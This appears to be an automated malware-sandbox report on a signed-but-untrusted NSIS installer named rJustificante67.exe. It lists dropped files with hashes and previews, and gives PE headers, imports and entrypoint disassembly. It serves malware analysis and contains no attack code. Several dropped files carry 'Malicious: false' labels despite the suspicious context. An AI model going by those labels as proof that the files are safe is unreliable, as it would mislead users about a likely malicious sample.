SSDEEP:	12:u114MOHT3MUxK9P8pl/3A1nP6uzRS2SqT:u0Pz3Lk9olfOloC
MD5:	050C9A234AB7B30322C3EFFE05E023FE
SHA1:	57E9C9878F84EDBC84DDA6BBA597449682045E3F
SHA-256:	F44BE9C8ED64349D20B20078D75F0B3EAB694C3D461A6A8D9E9A4A2D69B7F4D7
SHA-512:	342C6957AAD2DD2DF6A0ABEAFAB9172507424958A380FCC9653885D250E34EAFAFD97B7369AFD99F4536FE32B1CF173F87871B0B8178FCA17CB27D6E8796F806
Malicious:	false
Reputation:	low
Preview:	[NONALPHABETICALLY SPATIER]..Thoracaorta olina udmntningsprofilerne seely rwy ecuadorianeres mexicanize foredate plumaged......untriabness jagerfly omplaceret good litteratursgningsprocessers,salmagundi forgrundsfigurers medbestemmelsesrets endoskeletal fascinates trvesmulds residencia flestes unshrine ciano rundturerne..;darts pentacetate overstudiousness avledygtigheds,disbursals dynamitbombes coquelicot herres..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister\raastofindvindinger\pulpitical\Furciform\Uligevgten\Devoutnesses.txt

Download File

Process:	C:\Users\user\Desktop\rJustificante67.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	475
Entropy (8bit):	4.3542790265833675
Encrypted:	false
SSDEEP:	12:t+AKS2bg+3+/Ll3mRoOqd+IAm4YCOCu/JvdXfVEuTBt:t+AiM+3+/+oORLnybXNjt
MD5:	1D33156EB1A1B99FB42DCFAAD5F8507B
SHA1:	BC3E09CC2EED6BB0E6CC18734DBD56741A69E898
SHA-256:	C17B44134663E4FD3E807D38EFD54AD9363529C998BDD1808972B877D9868740
SHA-512:	A0D564FE70EC3107A9B97D95D941D1715D3B9400A98F7B25802912FD6C9DDC0E726AEBD7448D2ACF092458C2D27B95E3B4D07853CF64CE78EC21DD817A765D03
Malicious:	false
Preview:	..[pratincolous screenwise]..holohedric mesterkok pseudocentric passagian henkogning.Crab bidragsresolutioners wogs depolarising conversionism..Pancreatogenous dagsregnen neuronophagia nonheroical stadsbibliotekarernes..fjenderne biosensor thrive grimaldi supersubtilizeds vange fundamentalisternes nonhectically elefantordnerne rudish.Kultivatorers proprietresses ballver adjustability concertizers ejendomsadministrations churchish eolipiles elvene restocks gruppedynamik..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister\raastofindvindinger\pulpitical\Furciform\Uligevgten\Fibrocartilaginous.eut

Download File

Process:	C:\Users\user\Desktop\rJustificante67.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	3668281
Entropy (8bit):	0.1586482976623458
Encrypted:	false
SSDEEP:	24576:paHSA30j7GUTTN1qfdIyGXJayR6KfVBbsMJAL5YvXYRvc6am967q2Ha5v6pHlrER:8
MD5:	5B59BC89F150197449CC6BA8EDFB5BE2
SHA1:	14F50AD3A09D0382F786DA023DC041B41CEB9DEA
SHA-256:	7B102E5DF1828D5A268943C19947A74C085FFE85CD9A3CC4DA915794506C5772
SHA-512:	0372B74E4B3542A784ED8B274584F2FE6203D4F5B36896438F6405D14789BBDDFD6104C27877B9885F6A42D0E6628AC45AB6689304CD93AB4DF809299D27E486
Malicious:	false
Preview:	.................................................................................................................................................................................................................................................................................................................................C........................................................................................................................................................................................................................................................................................................................................................................................................................W..........................................................................................~.......................t.................................................................................................7......................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister\raastofindvindinger\pulpitical\Furciform\Uligevgten\Flugtningerne.con

Download File

Process:	C:\Users\user\Desktop\rJustificante67.exe
File Type:	data
Category:	dropped
Size (bytes):	6483488
Entropy (8bit):	0.15918176319715002
Encrypted:	false
SSDEEP:	12288:yd3Q3QCvvJpDXwJqKikWvCQs2wmmZqdOZukbo2PKnO4dxpDzJ9JBtJ1u/08N4IvL:+
MD5:	88649EB8E8169913A0384E0BF6C57097
SHA1:	0C9510E755AD46A2EC51511D6057A54ADE9FB876
SHA-256:	79940BE88674AB93E8B4571D07FF6961A7C3186C5A264156F8E3EE43074A03FC
SHA-512:	53E1161ABDC7B16CBCD78D6F3222F7B3DF97273847AC28415CE851D30443FD3C5683D338F469BA2808B9D15A0A6C4092473B83AECF4FE5DCD90500E5B3424938
Malicious:	false
Preview:	KKKKKKKKKKKKKKKKKKKKKKKKKKVKKKKKKKKUKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK.KKKKKKKKKKKKKKKKKKKKKKKKKKKKKK.KKKKKKKKKKKKKKKKKKKKKKKKKKKKK.KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK.KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK#KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKxKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK.KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK.KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK.KKKKKKKK

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister\raastofindvindinger\pulpitical\Furciform\Uligevgten\Parkgsterne.jpg

Download File

Process:	C:\Users\user\Desktop\rJustificante67.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 101x675, components 3
Category:	dropped
Size (bytes):	5105
Entropy (8bit):	7.707469411628028
Encrypted:	false
SSDEEP:	96:Rh2EA0orehnK1NOHhv2qMgU0NbA9I2l26s7v7aqIJuE5X6E:L2h0QyyOHcEU0N0lds7v7aqIJFl6E
MD5:	9D1B62DD46FDA6AD61CCB778EF066AAA
SHA1:	BCC9D2C609F6C21373F19D0352B66940F501FDF7
SHA-256:	04BBB2A1F5AA03C71FDF84159661069150AE1A748687DE2E1A079AF3FA46C2E9
SHA-512:	E1C76B9FA9A947ADCC25F20EBA39E74447487357EE724B29CBF58F61DE9FFC46637B6ED8627C2427DD5961F7F01A096FF821701DD0C7637BE3D7D53414FCD020
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........e.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...O...<W.\|..)..p..B.Z.(.%.J(...)h...Z(.(....E8R.p....).S.K)...AN..B..R...QK@....(...Z)\,Q..H).f(p..H)..--...AJ(....-..%..\QE..R.@.".).<V...<R.p.R.N...E ...ZE ...C.)qE!.(..P.!N....h`....J).....N..I.-....E-...(...QKE!..8R.N.....H).I.)h..%..Q.)........-.P0...P.!N...+C...8R.p..B.AN.).-.R.).-.P0..(.QKE.).p...Z..QN...*M.....RR.Z(.....ZC...QE.(....B.).S.j.t(.R.p.- ..JZE$...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister\raastofindvindinger\pulpitical\Furciform\Uligevgten\Unhealthfully.fet

Download File

Process:	C:\Users\user\Desktop\rJustificante67.exe
File Type:	data
Category:	dropped
Size (bytes):	3546314
Entropy (8bit):	0.15902781497317262
Encrypted:	false
SSDEEP:	3072:DU6ggwMAubnOrQTAzAU0YUfpUsQ0iqiHKGeWPKlEk7fO7Xye1AQK3AIfXnxqCp/D:U4
MD5:	F94EBBF3A7C671FC942B917794CBEF99
SHA1:	3B758A6369077F26BE0F6CD9D4850BEF7B1D9360
SHA-256:	D99A359F39C97D7B0CC4D1BF25DB5D408102DD9C8620798AE7D13A203CF5E9DC
SHA-512:	34E66715AA81F5DFE93638BB82B4867F3A7FC95B7C3906789E17DEC4389FFF56B867207246A5F1E42FE895D734FE7932A8B6629C3448465AAFC8E9870F807E40
Malicious:	false
Preview:	oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo.oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo.oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo.oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo~oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister\raastofindvindinger\pulpitical\Furciform\Uligevgten\hf.udp

Download File

Process:	C:\Users\user\Desktop\rJustificante67.exe
File Type:	data
Category:	dropped
Size (bytes):	353647
Entropy (8bit):	0.15907710403027892
Encrypted:	false
SSDEEP:	768:4yIQ3t0qOqAIuSwA+ulme7ikqfZBNlmMGJT:4yndASyjfFmMGJT
MD5:	2C97E07B2BE199BF59EBC17FB69E93F9
SHA1:	9842B8BFB262F98BE3040F3DFD668D98EDD4B705
SHA-256:	985B6B12A0B902F3EB7A050B2A6D300C286760DF2C6B0BFDABD58BC4814E691E
SHA-512:	FD157D798D3CFFF1997950467C936D3F0252619549CD35C05369ECFFB6AA586A5DB994C26FB108FE582BACB8335537F3117B55431D49A4F91965E6561BA0B599
Malicious:	false
Preview:	((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((D((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((.((((((((((((((((((((((((((((((.((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((.((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((i((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((.(((((((((((((((((((((((((.((((((((((((((((((((.((((((((((((.((((((((((((((((((((((((((((((((((((((((((((

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister\raastofindvindinger\pulpitical\Furciform\Uligevgten\indberegne.ini

Download File

Process:	C:\Users\user\Desktop\rJustificante67.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	444
Entropy (8bit):	4.525295088742093
Encrypted:	false
SSDEEP:	6:73KgcLQdvIPtvg6FV0pRQAdAlBGZMbG/rNp8ct3zLXAkLkLn+ZGMXQBBvn:7xqhtvruRQAKlgZMb0Jp8AAKs+ZGMAb
MD5:	9607A2F26574486A7800BF4604216BA4
SHA1:	660407EE407DE38306C2B87A08836484FEF365A0
SHA-256:	D2D0B4E5D2B15B838AB70CB57F619B6DFF45693C1D0BA85AB3EF424F9137F263
SHA-512:	806C04FBD565E0D825D45321963474327DEE514346C720728B1AFD0C496466FE5EF41F85B05A0D7BED2BDD6B86D35D6979B1D12E27DE4EF800BEFDE50EBB84BE
Malicious:	false
Preview:	triseme caryocaraceae salgstidspunkternes sadelpladsernes sorglseste vocaliser metrically hamsternes udslukkede pneumoencephalogram,udnyttendes fordrej b septotomy underprospect ordiner hexagyn harst featlier bygningstekniske fremsagde..troskabseds praepostor salvelsesfulde teloteropathic.Guaranteing merchandisable vanes jdekagernes....;lodovico opslidningen devota.Acalephes pyrophyllte presatisfactory tilhngeres adrue....[GLIOSA FLOTSAM]..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister\raastofindvindinger\pulpitical\Furciform\Uligevgten\stepmotherly.txt

Download File

Process:	C:\Users\user\Desktop\rJustificante67.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	559
Entropy (8bit):	4.296102616189727
Encrypted:	false
SSDEEP:	12:bXtqNUBZnHnk/6QXWygj1S4j2d9CE1IfxlrV7wm1n4IF39CO3:RqCgRu1L2xIfPVwml39C8
MD5:	A50C62B18088D107A85C8702BE38A5AC
SHA1:	17B0A71D87A1DF657749095527DFFC4DD549F793
SHA-256:	A57AF19FF1A065F7B813EE1C8D356EF3C199E3A1F49BB045BDD8391C6E3F185D
SHA-512:	6935DD9D8F8FBE121A7E675A2D82C36B7369B2E661AE04866D8A916EE7B907FB04200C0D68F7F93863CF2AB77125F1C93FFB6CBA38D9344D9BA9EAFFA0E1596B
Malicious:	false
Preview:	leeftail hypnotics asymmetron servicepriser rumfrger,scrivaille supervictoriousness policemanism fllesnvnerens undertrained inverses rb indhegnede betegnende likeness chounce........filstrrelserne unpracticable reflexives tlf,nazistpartiet junk programudfrelses indsttelsernes revnefrdig unrefulgently ligevgtene resdoktoren ulsters acupunctuation........meliponinae graphiola skikkeligere opgrelsen overvaeldende akkusativisk fancical micturated overskrev avocadokoedet,glam rebounded rimation telegrammets castilianer attestations policedom urocentrum......

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister\raastofindvindinger\pulpitical\Furciform\Uligevgten\vejenes.dre

Download File

Process:	C:\Users\user\Desktop\rJustificante67.exe
File Type:	data
Category:	dropped
Size (bytes):	6308819
Entropy (8bit):	0.15925830676764186
Encrypted:	false
SSDEEP:	384:+DzGyAR9UEKIy6duRb8D9y8+uW7uJdrYtTefHy49heYmVlrseXxGVaVPcGuceLNp:kzoRBsuhf/uBhy
MD5:	0EA793EA873153FB0A67ADFD9F9451C1
SHA1:	F2449BB27F6DA973F48F8DBC9E0DBF7F87675F19
SHA-256:	C49049BB1D44B45C17EC4314E5F51BD883519682F80F424DAC4C1DAE4AF2DDF5
SHA-512:	46A1B9741E0D01A209D18F0DF9818C727C0F4814C9643B138A354AADAE7F3E0AB70EEB600C7045243312B583DE230F550500106026861A1EE25EAE356E674B99
Malicious:	false
Preview:	??????????????????????????.????????????????????????????????????????????????????????????????????????????????????????????????????????????.?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????:????????????????????????????????????????????.??????????????.???????????????????9????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????.???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????.?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????

C:\Users\user\AppData\Local\Temp\nsc77E8.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\rJustificante67.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	5.775131082799803
Encrypted:	false
SSDEEP:	192:eA2HS+ihg200uWz947Wzvxu6v0MI7JOde+Ij5Z77dslFsEf:mS62Gw947ExuGDI7J8EF7KIE
MD5:	B853D5D2361ADE731E33E882707EFC34
SHA1:	C58B1AEABDF1CBB8334EF8797E7ACEAA7A1CB6BE
SHA-256:	F0CD96E0B6E40F92AD1AA0EFACDE833BAE807B92FCA19BF062C1CF8ACF29484B
SHA-512:	8EA31D82FFA6F58DAB5632FE72690D3A6DB0BE65AEC85FC8A1F71626773C0974DCEBEFAE17BCF67C4C56EF442545E985EEA0B348FF6E4FC36740640092B08D69
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: kvk78zDZTu.exe, Detection: malicious, Browse Filename: kvk78zDZTu.exe, Detection: malicious, Browse Filename: RFQ- PO#0224-HANYOUNG Project REV03 -SUPPLY.com.exe, Detection: malicious, Browse Filename: RFQ- PO#0224-HANYOUNG Project REV03 -SUPPLY.com.exe, Detection: malicious, Browse Filename: KEO-Order-3AY37A-APRIL_3103734_SUA721302_301824_01AU481924.exe, Detection: malicious, Browse Filename: KEO-Order-3AY37A-APRIL_3103734_SUA721302_301824_01AU481924.exe, Detection: malicious, Browse Filename: Lj4maSom2B.exe, Detection: malicious, Browse Filename: Lj4maSom2B.exe, Detection: malicious, Browse Filename: HW#210872-218YAT-THEON-GLOBAL-Y801823-1AHEY361-APL38102823-19011.exe, Detection: malicious, Browse Filename: HW#210872-218YAT-THEON-GLOBAL-Y801823-1AHEY361-APL38102823-19011.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...q..Q...........!................9'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............................... ..`.rdata..C....0......."..............@..@.data...x....@.......&..............@....reloc..@....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsv724A.tmp

Download File

Process:	C:\Users\user\Desktop\rJustificante67.exe
File Type:	data
Category:	dropped
Size (bytes):	21068347
Entropy (8bit):	2.4627673404814754
Encrypted:	false
SSDEEP:	24576:P395pNfzkxQO3ZjhaHSA30j7GUTTN1qfdIyGXJayR6KfVBbsMJAL5YvXYRvc6amL:P3TfzLO6l
MD5:	3F60B5D09D9B20525F7D2FA98B9BDCD5
SHA1:	DBEF30C223C8D87AC8CB484A86AEFA5FE8EEAEEB
SHA-256:	8254B3C0784AD657D4D19FBF20265BF2C1C505B3789B45078F6C02CD4DCE9202
SHA-512:	C50CFFF349E8CCDED8E2395FB2C1C94A7296BD4381C82068CEADBB1D8DA009A8A4ADDA5F008BBB080D858DE4E7475E51FBCD3FEE7EF1CEEE62A579765CD8F10B
Malicious:	false
Preview:	d\......,...................A....4.......[......4\..........................................................................................................................................................................................................................................G...y...........<...j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.468795037346412
Encrypted:	false
SSDEEP:	6144:HzZfpi6ceLPx9skLmb0fSZWSP3aJG8nAgeiJRMMhA2zX4WABluuNGjDH5S:TZHtSZWOKnMM6bFpYj4
MD5:	32DCF40DF28975A4E611432AF6FF8192
SHA1:	6357E2CFC2D3B81CE78C707851684ECE1B20F654
SHA-256:	9F2F8BDB11F855B208F3340DFD1CE63491F128C40972FD6501FDA84CE4270156
SHA-512:	9777380C6F55A575E22EE9A68E41DE6ED2DD33974A0978FD50E7FD264AC8ED463C9BEA88E2CAB80DC5871473B5C6468C117A4881ABC6CEF48D5BB37D4FBE78ED
Malicious:	false
Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm:....................................................................................................................................................................................................................................................................................................................................................G..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.908398248261527
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	rJustificante67.exe
File size:	1'025'520 bytes
MD5:	96bc48e7cc38d731e7e2c25f3f80a88e
SHA1:	bd30afd2f438928b3cb98d9f74766f1e401db091
SHA256:	79714172680d9fd5b1d49fc518abe9cef9200194a04b6611466beccb28c31728
SHA512:	7d71064359f17cae6128db87fdc9a743368b441310d5118734e0ba2a44f5673aeb0f93ea129faa51c6f61f36f135a38f2d90dc550708e87bec67131e4011f908
SSDEEP:	24576:IGLEfEEQyQpBGB59WIMJfEKwqQnc9V4+QA3plULISW1D:1+3isWppTBEk3AAD
TLSH:	C3252392E3E19A6BFE4347B99532D6755A93FE21045180472FECFE3A793330A9447B02
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.ju.ju.j..ujw.ju.+j..j..wjd.j!..j..j..,jt.jRichu.j........PE..L......Q.................`..........3.......p....@

File Icon


Icon Hash:	bac6b2aeaaaeb6b2

Static PE Info

General

Entrypoint:	0x40331c
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x51E3058B [Sun Jul 14 20:09:47 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	17b7d61bda0f7478e36d9ce3d4170680

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Bevismateriales, E=Lingvistikkens@Carbolxylol.Vau, O=Bevismateriales, L=Llansamlet, OU="Tegnvise servicekontrakter ", S=Wales, C=GB
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	10/03/2024 08:28:48 10/03/2025 08:28:48
Subject Chain	CN=Bevismateriales, E=Lingvistikkens@Carbolxylol.Vau, O=Bevismateriales, L=Llansamlet, OU="Tegnvise servicekontrakter ", S=Wales, C=GB
Version:	3
Thumbprint MD5:	0FC9B0A6AEAA7BB702353854F53B5C48
Thumbprint SHA-1:	BDF672A357CC8F08CEE9911C1A7E1915C0A6D32A
Thumbprint SHA-256:	BC4DD2CD08BFCA1FB61E76017CCAF4F20BDEE8F90DD39181E7DFED752E095BB6
Serial:	35E1914ECD93556C28ACB1E7F4742F1A75FB97D3

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+14h], ebp
mov dword ptr [esp+10h], 00409230h
mov dword ptr [esp+1Ch], ebp
call dword ptr [00407034h]
push 00008001h
call dword ptr [004070BCh]
push ebp
call dword ptr [004072ACh]
push 00000008h
mov dword ptr [00429298h], eax
call 00007FD7592EC892h
mov dword ptr [004291E4h], eax
push ebp
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebp
push 00420690h
call dword ptr [0040717Ch]
push 0040937Ch
push 004281E0h
call 00007FD7592EC4FDh
call dword ptr [00407134h]
mov ebx, 00434000h
push eax
push ebx
call 00007FD7592EC4EBh
push ebp
call dword ptr [0040710Ch]
cmp word ptr [00434000h], 0022h
mov dword ptr [004291E0h], eax
mov eax, ebx
jne 00007FD7592E99EAh
push 00000022h
mov eax, 00434002h
pop esi
push esi
push eax
call 00007FD7592EBF59h
push eax
call dword ptr [00407240h]
mov dword ptr [esp+18h], eax
jmp 00007FD7592E9AAEh
push 00000020h
pop edx
cmp cx, dx
jne 00007FD7592E99E9h
inc eax
inc eax
cmp word ptr [eax], dx
je 00007FD7592E99DBh
add word ptr [eax], 0000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7494	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x72000	0xd698	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xf9740	0xeb0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x2b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5e20	0x6000	dd493ae9ebfb948f2a612edd72200a78	False	0.6545003255208334	data	6.407301589030798	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1354	0x1400	8a134e15423272c853e24b49bfc8707f	False	0.43046875	data	5.037834422880877	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x202d8	0x600	baf389fb3ef48369d3c1f90021fcff8b	False	0.4733072916666667	data	3.7606720362000137	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2a000	0x48000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x72000	0xd698	0xd800	9bac6fbf076b462d9856d662ef171efb	False	0.19165943287037038	data	3.6185917239970986	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x72268	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.1762402774858104
RT_ICON	0x7b710	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.17064315352697096
RT_ICON	0x7dcb8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.20684803001876173
RT_DIALOG	0x7ed60	0x100	data	English	United States	0.5234375
RT_DIALOG	0x7ee60	0xf8	data	English	United States	0.6330645161290323
RT_DIALOG	0x7ef58	0xa0	data	English	United States	0.6125
RT_DIALOG	0x7eff8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x7f058	0x30	data	English	United States	0.8333333333333334
RT_VERSION	0x7f088	0x220	data	English	United States	0.5459558823529411
RT_MANIFEST	0x7f2a8	0x3ea	XML 1.0 document, ASCII text, with very long lines (1002), with no line terminators	English	United States	0.5179640718562875

Imports

DLL	Import
KERNEL32.dll	CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, MultiByteToWideChar, FindClose, MulDiv, ReadFile, WriteFile, lstrlenA, WideCharToMultiByte
